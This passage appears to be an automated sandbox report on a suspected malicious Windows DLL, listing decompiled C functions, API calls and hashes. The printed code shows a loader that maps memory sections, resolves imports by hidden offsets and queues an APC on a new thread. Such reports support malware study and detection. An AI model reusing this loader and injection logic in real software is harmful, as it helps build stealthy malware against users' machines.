                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,6E37B7A0,000008BB), ref: 6E2E576F
                                                                                                                            • Part of subcall function 6E2E72B0: task.LIBCPMTD ref: 6E2E7352
                                                                                                                            • Part of subcall function 6E2EBA20: swap.LIBCPMTD ref: 6E2EBA39
                                                                                                                          • CreateSemaphoreW.KERNEL32(00000000,00000007,00000007,00000000,6E367144,?,?,?,?,?,00000000), ref: 6E2E5950
                                                                                                                          • std::locale::locale.LIBCPMTD ref: 6E2E59D8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: FileModuleName$CreateSemaphorestd::locale::localeswaptask
                                                                                                                          • String ID: ?
                                                                                                                          • API String ID: 756721536-1684325040
                                                                                                                          • Opcode ID: 6f85f5dcef35b710a456ca4966ad4755d77379066af31afc9f14c1dbe23b4efd
                                                                                                                          • Instruction ID: 09b3f38f99fddfd30bda2fb762b5b80dca631554444c509bd5469c0b50b8b9ad
                                                                                                                          • Opcode Fuzzy Hash: 6f85f5dcef35b710a456ca4966ad4755d77379066af31afc9f14c1dbe23b4efd
                                                                                                                          • Instruction Fuzzy Hash: 295293B0900538CFCF08CFA8D990BAD77BAFB8A305F6089A9D54597794D738D849DB48
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 72%
                                                                                                                          			E6E2D13B8(intOrPtr* __eax, void** _a4) {
                                                                                                                          				int _v12;
                                                                                                                          				void* _v16;
                                                                                                                          				void* _v20;
                                                                                                                          				void* _v24;
                                                                                                                          				int _v28;
                                                                                                                          				int _v32;
                                                                                                                          				intOrPtr _v36;
                                                                                                                          				int _v40;
                                                                                                                          				int _v44;
                                                                                                                          				void* _v48;
                                                                                                                          				void* __esi;
                                                                                                                          				long _t34;
                                                                                                                          				void* _t39;
                                                                                                                          				void* _t47;
                                                                                                                          				intOrPtr* _t48;
                                                                                                                          
                                                                                                                          				_t48 = __eax;
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				_v24 =  *((intOrPtr*)(__eax + 4));
                                                                                                                          				_v16 = 0;
                                                                                                                          				_v12 = 0;
                                                                                                                          				_v48 = 0x18;
                                                                                                                          				_v44 = 0;
                                                                                                                          				_v36 = 0x40;
                                                                                                                          				_v40 = 0;
                                                                                                                          				_v32 = 0;
                                                                                                                          				_v28 = 0;
                                                                                                                          				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                                                                                                          				if(_t34 < 0) {
                                                                                                                          					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                                                                                                          				} else {
                                                                                                                          					 *_t48 = _v16;
                                                                                                                          					_t39 = E6E2D1273(_t48,  &_v12); // executed
                                                                                                                          					_t47 = _t39;
                                                                                                                          					if(_t47 != 0) {
                                                                                                                          						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                                                                                                          					} else {
                                                                                                                          						memset(_v12, 0, _v24);
                                                                                                                          						 *_a4 = _v12;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t47;
                                                                                                                          			}



















                                                                                                                          APIs
                                                                                                                          • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000), ref: 6E2D1415
                                                                                                                            • Part of subcall function 6E2D1273: NtMapViewOfSection.NTDLL(00000000,000000FF,6E2D142A,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,6E2D142A,?), ref: 6E2D12A0
                                                                                                                          • memset.NTDLL ref: 6E2D1437
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Section$CreateViewmemset
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 2533685722-2766056989
                                                                                                                          • Opcode ID: c61638305c421a85b3a3431d95797393ed2746fec166c54830a0c940b8607d89
                                                                                                                          • Instruction ID: da103a6dc877d17a48853b67eb719e86aacf98774dc14ec4741c6c04df4d893b
                                                                                                                          • Opcode Fuzzy Hash: c61638305c421a85b3a3431d95797393ed2746fec166c54830a0c940b8607d89
                                                                                                                          • Instruction Fuzzy Hash: 0C210BB5D0020DAFDB01DFE9C8849DEFBB9EF48354F108929E655F3610D731AA488BA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E6E2D1DE5(void* __edi, intOrPtr _a4) {
                                                                                                                          				signed int _v8;
                                                                                                                          				intOrPtr* _v12;
                                                                                                                          				_Unknown_base(*)()** _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed short _v24;
                                                                                                                          				struct HINSTANCE__* _v28;
                                                                                                                          				intOrPtr _t43;
                                                                                                                          				intOrPtr* _t45;
                                                                                                                          				intOrPtr _t46;
                                                                                                                          				struct HINSTANCE__* _t47;
                                                                                                                          				intOrPtr* _t49;
                                                                                                                          				intOrPtr _t50;
                                                                                                                          				signed short _t51;
                                                                                                                          				_Unknown_base(*)()* _t53;
                                                                                                                          				CHAR* _t54;
                                                                                                                          				_Unknown_base(*)()* _t55;
                                                                                                                          				void* _t58;
                                                                                                                          				signed int _t59;
                                                                                                                          				_Unknown_base(*)()* _t60;
                                                                                                                          				intOrPtr _t61;
                                                                                                                          				intOrPtr _t65;
                                                                                                                          				signed int _t68;
                                                                                                                          				void* _t69;
                                                                                                                          				CHAR* _t71;
                                                                                                                          				signed short* _t73;
                                                                                                                          
                                                                                                                          				_t69 = __edi;
                                                                                                                          				_v20 = _v20 & 0x00000000;
                                                                                                                          				_t59 =  *0x6e2d41c0;
                                                                                                                          				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
                                                                                                                          				if(_t43 != 0) {
                                                                                                                          					_t45 = _t43 + __edi;
                                                                                                                          					_v12 = _t45;
                                                                                                                          					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                                                                                                                          					if(_t46 != 0) {
                                                                                                                          						while(1) {
                                                                                                                          							_t71 = _t46 + _t69;
                                                                                                                          							_t47 = LoadLibraryA(_t71); // executed
                                                                                                                          							_v28 = _t47;
                                                                                                                          							if(_t47 == 0) {
                                                                                                                          								break;
                                                                                                                          							}
                                                                                                                          							_v24 = _v24 & 0x00000000;
                                                                                                                          							 *_t71 = _t59 - 0x69b25f44;
                                                                                                                          							_t49 = _v12;
                                                                                                                          							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                                                                                                                          							_t50 =  *_t49;
                                                                                                                          							if(_t50 != 0) {
                                                                                                                          								L6:
                                                                                                                          								_t73 = _t50 + _t69;
                                                                                                                          								_v16 = _t61 + _t69;
                                                                                                                          								while(1) {
                                                                                                                          									_t51 =  *_t73;
                                                                                                                          									if(_t51 == 0) {
                                                                                                                          										break;
                                                                                                                          									}
                                                                                                                          									if(__eflags < 0) {
                                                                                                                          										__eflags = _t51 - _t69;
                                                                                                                          										if(_t51 < _t69) {
                                                                                                                          											L12:
                                                                                                                          											_t21 =  &_v8;
                                                                                                                          											 *_t21 = _v8 & 0x00000000;
                                                                                                                          											__eflags =  *_t21;
                                                                                                                          											_v24 =  *_t73 & 0x0000ffff;
                                                                                                                          										} else {
                                                                                                                          											_t65 = _a4;
                                                                                                                          											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                                                                                                                          											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                                                                                                                          												goto L12;
                                                                                                                          											} else {
                                                                                                                          												goto L11;
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									} else {
                                                                                                                          										_t51 = _t51 + _t69;
                                                                                                                          										L11:
                                                                                                                          										_v8 = _t51;
                                                                                                                          									}
                                                                                                                          									_t53 = _v8;
                                                                                                                          									__eflags = _t53;
                                                                                                                          									if(_t53 == 0) {
                                                                                                                          										_t54 = _v24 & 0x0000ffff;
                                                                                                                          									} else {
                                                                                                                          										_t54 = _t53 + 2;
                                                                                                                          									}
                                                                                                                          									_t55 = GetProcAddress(_v28, _t54);
                                                                                                                          									__eflags = _t55;
                                                                                                                          									if(__eflags == 0) {
                                                                                                                          										_v20 = _t59 - 0x69b25ec5;
                                                                                                                          									} else {
                                                                                                                          										_t68 = _v8;
                                                                                                                          										__eflags = _t68;
                                                                                                                          										if(_t68 != 0) {
                                                                                                                          											 *_t68 = _t59 - 0x69b25f44;
                                                                                                                          										}
                                                                                                                          										 *_v16 = _t55;
                                                                                                                          										_t58 = 0x593682f4 + _t59 * 4;
                                                                                                                          										_t73 = _t73 + _t58;
                                                                                                                          										_t32 =  &_v16;
                                                                                                                          										 *_t32 = _v16 + _t58;
                                                                                                                          										__eflags =  *_t32;
                                                                                                                          										continue;
                                                                                                                          									}
                                                                                                                          									goto L23;
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								_t50 = _t61;
                                                                                                                          								if(_t61 != 0) {
                                                                                                                          									goto L6;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							L23:
                                                                                                                          							_v12 = _v12 + 0x14;
                                                                                                                          							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                                                          							if(_t46 != 0) {
                                                                                                                          								continue;
                                                                                                                          							} else {
                                                                                                                          							}
                                                                                                                          							L26:
                                                                                                                          							goto L27;
                                                                                                                          						}
                                                                                                                          						_t60 = _t59 + 0x964da13a;
                                                                                                                          						__eflags = _t60;
                                                                                                                          						_v20 = _t60;
                                                                                                                          						goto L26;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				L27:
                                                                                                                          				return _v20;
                                                                                                                          			}

                                                                                                                          0x6e2d1eca
                                                                                                                          0x6e2d1ed1
                                                                                                                          0x6e2d1ed6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d1edc
                                                                                                                          0x6e2d1ee7
                                                                                                                          0x00000000
                                                                                                                          0x6e2d1ee7
                                                                                                                          0x6e2d1ede
                                                                                                                          0x6e2d1ede
                                                                                                                          0x6e2d1ee4
                                                                                                                          0x00000000
                                                                                                                          0x6e2d1ee4
                                                                                                                          0x6e2d1e12
                                                                                                                          0x6e2d1ee8
                                                                                                                          0x6e2d1eed

                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E2D1E1D
                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 6E2D1E8F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2574300362-0
                                                                                                                          • Opcode ID: bf3048a1cb85ade1c81645764f789790540ba14ca683a111abc798c8eb0f530c
                                                                                                                          • Instruction ID: f530236d31925416ebb53034c3930c872c853181821fff25fd68617e3fc35b21
                                                                                                                          • Opcode Fuzzy Hash: bf3048a1cb85ade1c81645764f789790540ba14ca683a111abc798c8eb0f530c
                                                                                                                          • Instruction Fuzzy Hash: FA313A75E0020BDFDB44CF99C894AADB7FAFF45311B104069DA11EB640E770DA89CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E6E2D1273(void** __esi, PVOID* _a4) {
                                                                                                                          				long _v8;
                                                                                                                          				void* _v12;
                                                                                                                          				void* _v16;
                                                                                                                          				long _t13;
                                                                                                                          
                                                                                                                          				_v16 = 0;
                                                                                                                          				asm("stosd");
                                                                                                                          				_v8 = 0;
                                                                                                                          				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                                                                                                          				if(_t13 < 0) {
                                                                                                                          					_push(_t13);
                                                                                                                          					return __esi[6]();
                                                                                                                          				}
                                                                                                                          				return 0;
                                                                                                                          			}








                                                                                                                          APIs
                                                                                                                          • NtMapViewOfSection.NTDLL(00000000,000000FF,6E2D142A,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,6E2D142A,?), ref: 6E2D12A0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: SectionView
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1323581903-0
                                                                                                                          • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                          • Instruction ID: 0f658fd4661e9293b57205bfc823aa0561a172ea8e4aa63b401bc34931fc18fe
                                                                                                                          • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                          • Instruction Fuzzy Hash: 5DF012B590420CBFEB119FA5CC89C9FBBBDEB44354B104939F252E1490D6319E4C8A60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E6E2D19C2(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				_Unknown_base(*)()* _t29;
                                                                                                                          				_Unknown_base(*)()* _t33;
                                                                                                                          				_Unknown_base(*)()* _t36;
                                                                                                                          				_Unknown_base(*)()* _t39;
                                                                                                                          				_Unknown_base(*)()* _t42;
                                                                                                                          				intOrPtr _t46;
                                                                                                                          				struct HINSTANCE__* _t50;
                                                                                                                          				intOrPtr _t56;
                                                                                                                          
                                                                                                                          				_t56 = E6E2D1000(0x20);
                                                                                                                          				if(_t56 == 0) {
                                                                                                                          					_v8 = 8;
                                                                                                                          				} else {
                                                                                                                          					_t50 = GetModuleHandleA( *0x6e2d41c4 + 0x6e2d5014);
                                                                                                                          					_v8 = 0x7f;
                                                                                                                          					_t29 = GetProcAddress(_t50,  *0x6e2d41c4 + 0x6e2d5151);
                                                                                                                          					 *(_t56 + 0xc) = _t29;
                                                                                                                          					if(_t29 == 0) {
                                                                                                                          						L8:
                                                                                                                          						E6E2D1397(_t56);
                                                                                                                          					} else {
                                                                                                                          						_t33 = GetProcAddress(_t50,  *0x6e2d41c4 + 0x6e2d5161);
                                                                                                                          						 *(_t56 + 0x10) = _t33;
                                                                                                                          						if(_t33 == 0) {
                                                                                                                          							goto L8;
                                                                                                                          						} else {
                                                                                                                          							_t36 = GetProcAddress(_t50,  *0x6e2d41c4 + 0x6e2d5174);
                                                                                                                          							 *(_t56 + 0x14) = _t36;
                                                                                                                          							if(_t36 == 0) {
                                                                                                                          								goto L8;
                                                                                                                          							} else {
                                                                                                                          								_t39 = GetProcAddress(_t50,  *0x6e2d41c4 + 0x6e2d5189);
                                                                                                                          								 *(_t56 + 0x18) = _t39;
                                                                                                                          								if(_t39 == 0) {
                                                                                                                          									goto L8;
                                                                                                                          								} else {
                                                                                                                          									_t42 = GetProcAddress(_t50,  *0x6e2d41c4 + 0x6e2d519f);
                                                                                                                          									 *(_t56 + 0x1c) = _t42;
                                                                                                                          									if(_t42 == 0) {
                                                                                                                          										goto L8;
                                                                                                                          									} else {
                                                                                                                          										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                                                                                                          										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                                                                                                          										_t46 = E6E2D13B8(_t56, _a12); // executed
                                                                                                                          										_v8 = _t46;
                                                                                                                          										if(_t46 != 0) {
                                                                                                                          											goto L8;
                                                                                                                          										} else {
                                                                                                                          											 *_a16 = _t56;
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _v8;
                                                                                                                          			}













                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E2D1000: HeapAlloc.KERNEL32(00000000,?,6E2D15ED,00000030,73B763F0,00000000), ref: 6E2D100C
                                                                                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E2D1051,?,?,?,?), ref: 6E2D19E6
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 6E2D1A08
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 6E2D1A1E
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 6E2D1A34
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 6E2D1A4A
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 6E2D1A60
                                                                                                                            • Part of subcall function 6E2D13B8: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000), ref: 6E2D1415
                                                                                                                            • Part of subcall function 6E2D13B8: memset.NTDLL ref: 6E2D1437
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1632424568-0
                                                                                                                          • Opcode ID: e1a2ea817456e7067d0f309717bb3c5794b5e0780f07876b55f537461df60087
                                                                                                                          • Instruction ID: 1de46e531780b569552778de198a15de4b2cb85c3f30f9c10d332d8b11633200
                                                                                                                          • Opcode Fuzzy Hash: e1a2ea817456e7067d0f309717bb3c5794b5e0780f07876b55f537461df60087
                                                                                                                          • Instruction Fuzzy Hash: BE218DB0600A0FEFDB00DFA9CC44D9AB7EEEF452007004665EA64E7640E770EA48CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 86%
                                                                                                                          			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                                                                                                          				long _v8;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				void* __ebp;
                                                                                                                          				char _t9;
                                                                                                                          				void* _t10;
                                                                                                                          				void* _t18;
                                                                                                                          				void* _t23;
                                                                                                                          				void* _t36;
                                                                                                                          
                                                                                                                          				_push(__ecx);
                                                                                                                          				_t9 = _a8;
                                                                                                                          				_v8 = 1;
                                                                                                                          				if(_t9 == 0) {
                                                                                                                          					_t10 = InterlockedDecrement(0x6e2d4188);
                                                                                                                          					__eflags = _t10;
                                                                                                                          					if(_t10 == 0) {
                                                                                                                          						__eflags =  *0x6e2d418c;
                                                                                                                          						if( *0x6e2d418c != 0) {
                                                                                                                          							_t36 = 0x2328;
                                                                                                                          							while(1) {
                                                                                                                          								SleepEx(0x64, 1);
                                                                                                                          								__eflags =  *0x6e2d4198;
                                                                                                                          								if( *0x6e2d4198 == 0) {
                                                                                                                          									break;
                                                                                                                          								}
                                                                                                                          								_t36 = _t36 - 0x64;
                                                                                                                          								__eflags = _t36;
                                                                                                                          								if(_t36 > 0) {
                                                                                                                          									continue;
                                                                                                                          								}
                                                                                                                          								break;
                                                                                                                          							}
                                                                                                                          							CloseHandle( *0x6e2d418c);
                                                                                                                          						}
                                                                                                                          						HeapDestroy( *0x6e2d4190);
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					if(_t9 == 1 && InterlockedIncrement(0x6e2d4188) == 1) {
                                                                                                                          						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                          						 *0x6e2d4190 = _t18;
                                                                                                                          						_t41 = _t18;
                                                                                                                          						if(_t18 == 0) {
                                                                                                                          							L6:
                                                                                                                          							_v8 = 0;
                                                                                                                          						} else {
                                                                                                                          							 *0x6e2d41b0 = _a4;
                                                                                                                          							asm("lock xadd [eax], edi");
                                                                                                                          							_push( &_a8);
                                                                                                                          							_t23 = E6E2D153C(E6E2D1719, E6E2D1C35(_a12, 1, 0x6e2d4198, _t41));
                                                                                                                          							 *0x6e2d418c = _t23;
                                                                                                                          							if(_t23 == 0) {
                                                                                                                          								asm("lock xadd [esi], eax");
                                                                                                                          								goto L6;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _v8;
                                                                                                                          			}













                                                                                                                          APIs
                                                                                                                          • InterlockedIncrement.KERNEL32(6E2D4188), ref: 6E2D1B7B
                                                                                                                          • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E2D1B90
                                                                                                                            • Part of subcall function 6E2D153C: CreateThread.KERNELBASE(00000000,00000000,00000000,?,6E2D4198,6E2D1BC9), ref: 6E2D1553
                                                                                                                            • Part of subcall function 6E2D153C: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E2D1568
                                                                                                                            • Part of subcall function 6E2D153C: GetLastError.KERNEL32(00000000), ref: 6E2D1573
                                                                                                                            • Part of subcall function 6E2D153C: TerminateThread.KERNEL32(00000000,00000000), ref: 6E2D157D
                                                                                                                            • Part of subcall function 6E2D153C: CloseHandle.KERNEL32(00000000), ref: 6E2D1584
                                                                                                                            • Part of subcall function 6E2D153C: SetLastError.KERNEL32(00000000), ref: 6E2D158D
                                                                                                                          • InterlockedDecrement.KERNEL32(6E2D4188), ref: 6E2D1BE3
                                                                                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 6E2D1BFD
                                                                                                                          • CloseHandle.KERNEL32 ref: 6E2D1C19
                                                                                                                          • HeapDestroy.KERNEL32 ref: 6E2D1C25
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2110400756-0
                                                                                                                          • Opcode ID: 6e0f9a9dec22ce244f819cd7b61f08f7e8b1bbc53cce458049474725a31ae946
                                                                                                                          • Instruction ID: 5e2b39d50ecd53e7d2c67e2209d4f774af2520c6c4869190a5f3178e3bf99311
                                                                                                                          • Opcode Fuzzy Hash: 6e0f9a9dec22ce244f819cd7b61f08f7e8b1bbc53cce458049474725a31ae946
                                                                                                                          • Instruction Fuzzy Hash: 90218E35A04A1EAFCB00AFE9CC8CA497BBBF7567627144825E756D3540E630C98DCB61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E6E2D153C(long _a4, DWORD* _a12) {
                                                                                                                          				_Unknown_base(*)()* _v0;
                                                                                                                          				void* _t4;
                                                                                                                          				long _t6;
                                                                                                                          				long _t11;
                                                                                                                          				void* _t13;
                                                                                                                          
                                                                                                                          				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e2d41c0, 0, _a12); // executed
                                                                                                                          				_t13 = _t4;
                                                                                                                          				if(_t13 != 0) {
                                                                                                                          					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                                                                                                                          					if(_t6 == 0) {
                                                                                                                          						_t11 = GetLastError();
                                                                                                                          						TerminateThread(_t13, _t11);
                                                                                                                          						CloseHandle(_t13);
                                                                                                                          						_t13 = 0;
                                                                                                                          						SetLastError(_t11);
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t13;
                                                                                                                          			}









                                                                                                                          APIs
                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,00000000,?,6E2D4198,6E2D1BC9), ref: 6E2D1553
                                                                                                                          • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E2D1568
                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 6E2D1573
                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 6E2D157D
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 6E2D1584
                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 6E2D158D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3832013932-0
                                                                                                                          • Opcode ID: 155ad02b79f2b814d5e2744008e6e715898260ac5ddb6fa2915089701fa58b99
                                                                                                                          • Instruction ID: 2783f6a8a9bcc7978703361582a7bd369cf6a955e6d3f57a690c969569b25a38
                                                                                                                          • Opcode Fuzzy Hash: 155ad02b79f2b814d5e2744008e6e715898260ac5ddb6fa2915089701fa58b99
                                                                                                                          • Instruction Fuzzy Hash: 45F08C32A04A29BBDB121BA0DC0CFABBFABFB0A753F004514F70990040C7A58804CBB1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,6E37C338,000008BB), ref: 6E2ED345
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: FileModuleName
                                                                                                                          • String ID: j6n$1$N
                                                                                                                          • API String ID: 514040917-767998455
                                                                                                                          • Opcode ID: 1c52a8fb4239f4e1b2e0cf06c705dc13faf70095c59f3ed9a9a65279422aebf7
                                                                                                                          • Instruction ID: 49d7f1dcaba074517f02aef7b9a37e0758418872f8ca569b34a950447486d15f
                                                                                                                          • Opcode Fuzzy Hash: 1c52a8fb4239f4e1b2e0cf06c705dc13faf70095c59f3ed9a9a65279422aebf7
                                                                                                                          • Instruction Fuzzy Hash: 80F272B15049B88FCF08CF69C590A797BBAF797301B3488EAD54596785E338D588EB0C
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 86%
                                                                                                                          			E6E2D189E(void* __edi, intOrPtr _a4) {
                                                                                                                          				signed int _v8;
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				unsigned int _v16;
                                                                                                                          				intOrPtr _v20;
                                                                                                                          				char _v24;
                                                                                                                          				void* _v28;
                                                                                                                          				intOrPtr _v32;
                                                                                                                          				intOrPtr _v36;
                                                                                                                          				void* _v40;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				intOrPtr _t46;
                                                                                                                          				void* _t53;
                                                                                                                          				intOrPtr _t54;
                                                                                                                          				intOrPtr _t57;
                                                                                                                          				signed int _t66;
                                                                                                                          				intOrPtr _t68;
                                                                                                                          				intOrPtr _t83;
                                                                                                                          				void* _t84;
                                                                                                                          
                                                                                                                          				_t83 =  *0x6e2d41b0;
                                                                                                                          				_t46 = E6E2D2016(_t83,  &_v24,  &_v16);
                                                                                                                          				_v20 = _t46;
                                                                                                                          				if(_t46 == 0) {
                                                                                                                          					asm("sbb ebx, ebx");
